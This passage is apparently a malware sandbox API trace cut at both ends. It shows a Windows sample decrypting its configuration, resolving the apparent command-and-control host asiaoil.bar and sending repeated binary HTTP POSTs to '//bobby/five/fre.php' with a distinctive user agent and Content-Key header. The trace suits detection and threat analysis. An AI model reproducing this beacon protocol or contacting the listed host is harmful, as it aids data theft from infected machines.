Flags=0x0, Size=0x24) returned 0x758508 [0320.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.809] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758508, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0320.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.810] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.911] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.911] GetProcessHeap () returned 0x740000 [0320.911] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758508 | out: hHeap=0x740000) returned 1 [0320.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.913] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0320.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.914] CryptDestroyKey (hKey=0x74d768) returned 1 [0320.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.915] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0320.915] GetProcessHeap () returned 0x740000 [0320.915] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766c00 [0320.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.916] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0320.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.917] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0320.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.918] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0320.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.918] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0320.919] GetProcessHeap () returned 0x740000 [0320.919] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c048 [0320.919] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0320.919] GetProcessHeap () returned 0x740000 [0320.919] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c048 | out: hHeap=0x740000) returned 1 [0320.919] GetProcessHeap () returned 0x740000 [0320.920] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766c00 | out: hHeap=0x740000) returned 1 [0320.920] GetProcessHeap () returned 0x740000 [0320.920] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0320.920] GetProcessHeap () returned 0x740000 [0320.920] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763938 [0320.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.921] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.926] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d540) returned 1 [0320.933] GetProcessHeap () returned 0x740000 [0320.933] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0320.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.934] CryptImportKey (in: hProv=0x75d540, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0320.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.934] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.935] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.936] GetProcessHeap () returned 0x740000 [0320.936] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0320.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.937] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763938, pdwDataLen=0x19fcfc | out: pbData=0x763938, pdwDataLen=0x19fcfc) returned 1 [0320.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.938] CryptDestroyKey (hKey=0x74d768) returned 1 [0320.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0320.938] CryptReleaseContext (hProv=0x75d540, dwFlags=0x0) returned 1 [0320.938] GetProcessHeap () returned 0x740000 [0320.938] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765898 [0320.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.939] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0320.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0320.940] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0321.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.016] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0321.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.017] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0321.017] GetProcessHeap () returned 0x740000 [0321.017] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bfd0 [0321.017] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0321.019] GetProcessHeap () returned 0x740000 [0321.019] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0321.019] socket (af=2, type=1, protocol=6) returned 0x358 [0321.020] connect (s=0x358, name=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0321.070] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0321.070] GetProcessHeap () returned 0x740000 [0321.070] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cee0 [0321.070] GetProcessHeap () returned 0x740000 [0321.070] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0321.071] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0321.072] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0321.072] GetProcessHeap () returned 0x740000 [0321.072] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0321.072] GetProcessHeap () returned 0x740000 [0321.073] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0321.073] GetProcessHeap () returned 0x740000 [0321.073] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763980 [0321.073] GetProcessHeap () returned 0x740000 [0321.073] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0321.073] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0321.074] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0321.074] GetProcessHeap () returned 0x740000 [0321.074] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0321.074] GetProcessHeap () returned 0x740000 [0321.075] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0321.075] send (s=0x358, buf=0x747928*, len=243, flags=0) returned 243 [0321.075] send (s=0x358, buf=0x761fd0*, len=159, flags=0) returned 159 [0321.075] GetProcessHeap () returned 0x740000 [0321.075] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0321.075] recv (in: s=0x358, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 569 [0321.192] GetProcessHeap () returned 0x740000 [0321.193] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0321.193] GetProcessHeap () returned 0x740000 [0321.194] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763980 | out: hHeap=0x740000) returned 1 [0321.194] GetProcessHeap () returned 0x740000 [0321.194] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0321.195] GetProcessHeap () returned 0x740000 [0321.195] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cee0 | out: hHeap=0x740000) returned 1 [0321.195] closesocket (s=0x358) returned 0 [0321.195] GetProcessHeap () returned 0x740000 [0321.195] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0321.195] GetProcessHeap () returned 0x740000 [0321.196] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765898 | out: hHeap=0x740000) returned 1 [0321.197] GetProcessHeap () returned 0x740000 [0321.197] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0321.197] GetProcessHeap () returned 0x740000 [0321.197] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bfd0 | out: hHeap=0x740000) returned 1 [0321.198] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x250) returned 0x358 [0321.199] Sleep (dwMilliseconds=0xea60) [0321.201] GetProcessHeap () returned 0x740000 [0321.201] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763ed8 [0321.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.209] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75ccc0) returned 1 [0321.221] GetProcessHeap () returned 0x740000 [0321.221] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0321.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.222] CryptImportKey (in: hProv=0x75ccc0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0321.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.223] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.224] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.224] GetProcessHeap () returned 0x740000 [0321.225] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0321.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.226] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763ed8, pdwDataLen=0x19fcfc | out: pbData=0x763ed8, pdwDataLen=0x19fcfc) returned 1 [0321.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.227] CryptDestroyKey (hKey=0x74d768) returned 1 [0321.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.228] CryptReleaseContext (hProv=0x75ccc0, dwFlags=0x0) returned 1 [0321.228] GetProcessHeap () returned 0x740000 [0321.228] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x7669d8 [0321.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.229] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.230] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.231] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.345] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.345] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.345] GetProcessHeap () returned 0x740000 [0321.345] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bfa8 [0321.345] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0321.345] GetProcessHeap () returned 0x740000 [0321.346] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bfa8 | out: hHeap=0x740000) returned 1 [0321.346] GetProcessHeap () returned 0x740000 [0321.346] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7669d8 | out: hHeap=0x740000) returned 1 [0321.346] GetProcessHeap () returned 0x740000 [0321.346] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763ed8 | out: hHeap=0x740000) returned 1 [0321.346] GetProcessHeap () returned 0x740000 [0321.346] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763938 [0321.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.347] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.355] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0321.362] GetProcessHeap () returned 0x740000 [0321.362] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0321.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.363] CryptImportKey (in: hProv=0x75cc38, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0321.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.364] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.365] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.365] GetProcessHeap () returned 0x740000 [0321.366] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0321.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.475] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763938, pdwDataLen=0x19fcfc | out: pbData=0x763938, pdwDataLen=0x19fcfc) returned 1 [0321.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.476] CryptDestroyKey (hKey=0x74d368) returned 1 [0321.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.477] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0321.477] GetProcessHeap () returned 0x740000 [0321.477] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0321.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.478] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0321.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.479] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0321.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.480] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0321.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0321.481] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0321.481] GetProcessHeap () returned 0x740000 [0321.481] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0321.481] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bff8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c418*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0321.482] GetProcessHeap () returned 0x740000 [0321.483] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b570 [0321.483] socket (af=2, type=1, protocol=6) returned 0x35c [0321.483] connect (s=0x35c, name=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0321.504] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bff8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c418*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0321.504] GetProcessHeap () returned 0x740000 [0321.504] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cd48 [0321.504] GetProcessHeap () returned 0x740000 [0321.504] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0321.504] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0321.505] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0321.505] GetProcessHeap () returned 0x740000 [0321.505] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0321.505] GetProcessHeap () returned 0x740000 [0321.506] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0321.506] GetProcessHeap () returned 0x740000 [0321.506] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763aa0 [0321.506] GetProcessHeap () returned 0x740000 [0321.506] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0321.507] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0321.508] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0321.508] GetProcessHeap () returned 0x740000 [0321.508] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0321.508] GetProcessHeap () returned 0x740000 [0321.508] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0321.508] send (s=0x35c, buf=0x747928*, len=243, flags=0) returned 243 [0321.509] send (s=0x35c, buf=0x761fd0*, len=159, flags=0) returned 159 [0321.509] GetProcessHeap () returned 0x740000 [0321.509] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0321.509] recv (in: s=0x35c, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 565 [0321.629] GetProcessHeap () returned 0x740000 [0321.629] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0321.630] GetProcessHeap () returned 0x740000 [0321.630] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763aa0 | out: hHeap=0x740000) returned 1 [0321.630] GetProcessHeap () returned 0x740000 [0321.630] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0321.630] GetProcessHeap () returned 0x740000 [0321.631] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cd48 | out: hHeap=0x740000) returned 1 [0321.631] closesocket (s=0x35c) returned 0 [0321.631] GetProcessHeap () returned 0x740000 [0321.631] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b570 | out: hHeap=0x740000) returned 1 [0321.632] GetProcessHeap () returned 0x740000 [0321.632] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0321.632] GetProcessHeap () returned 0x740000 [0321.633] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0321.633] GetProcessHeap () returned 0x740000 [0321.633] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0321.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x158) returned 0x35c [0321.635] Sleep (dwMilliseconds=0xea60) [0321.637] GetProcessHeap () returned 0x740000 [0321.637] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0321.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.639] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.648] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0321.658] GetProcessHeap () returned 0x740000 [0321.658] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758508 [0321.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.659] CryptImportKey (in: hProv=0x75cc38, pbData=0x758508, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0321.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.661] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0321.663] CryptSetKeyParam 